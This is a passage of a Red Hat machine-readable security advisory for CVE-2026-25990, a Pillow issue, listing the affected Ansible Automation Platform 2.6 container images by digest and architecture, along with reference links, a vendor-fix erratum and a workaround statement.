"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
